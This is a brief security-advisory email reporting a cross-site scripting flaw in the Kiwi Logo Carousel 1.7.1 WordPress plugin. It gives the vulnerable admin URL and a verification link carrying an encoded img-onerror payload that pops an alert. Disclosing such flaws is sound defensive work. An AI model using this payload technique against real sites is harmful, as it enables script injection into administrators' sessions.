Subject: Cross-Site Scripting (XSS) in Kiwi Logo Carousel 1.7.1
Date: Thu, 13 Aug 2015 16:14:06 +0200

Hello,

Plugin: Kiwi Logo Carousel 1.7.1 https://wordpress.org/plugins/kiwi-logo-carousel/

1. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/edit.php?post_type=kwlogos&page=kwlogos_settings&tab=[xss]
Vulnerable parameter: tab_flags_order

Example PHP callstack:
kiwi_logo_carousel_admin::admin_pages_manage_carousels   [/kiwi-logo-carousel/kiwi_logo_carousel_admin.php:466]

Verification:
http://localhost/wp-admin/edit.php?post_type=kwlogos&page=kwlogos_settings&tab=%3C%2Fcode%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--
Regards,
Marcin Probola,